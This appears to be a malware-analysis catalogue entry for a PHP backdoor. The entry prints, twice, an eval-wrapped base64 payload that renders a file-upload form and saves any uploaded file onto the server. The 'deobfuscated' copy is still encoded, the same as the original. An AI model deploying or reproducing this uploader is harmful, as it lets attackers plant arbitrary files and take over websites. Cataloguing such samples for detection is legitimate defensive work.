PHP Malware Analysis

Back to list

Tags

Execution
eval

Deobfuscated code

<?php

eval(BaSe64_Decode('ZWNobyAnPHRpdGxlPkh1c3Npbi12IDwvdGl0bGU+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIKIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIKaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnCjxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9CiAgICAgICAgZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9'));


Original code

<?
Eval(BaSe64_Decode('ZWNobyAnPHRpdGxlPkh1c3Npbi12IDwvdGl0bGU+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIKIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIKaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnCjxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9CiAgICAgICAgZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9'));
?>